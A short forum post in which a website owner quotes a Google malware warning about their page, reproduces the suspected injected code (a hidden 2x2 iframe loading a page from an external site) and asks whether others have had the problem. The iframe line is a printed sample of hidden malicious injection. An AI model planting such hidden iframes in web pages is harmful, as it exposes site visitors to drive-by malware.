Below is a message I received on Google on a page of my website:

When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

Here is the suspected injected code:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://stateexpressindia.com/wmaf.html?i=1513991>

My server host company told me that it could be a java exploit through Xara Web Designer MX Premium software.

Has anyone else had this problem?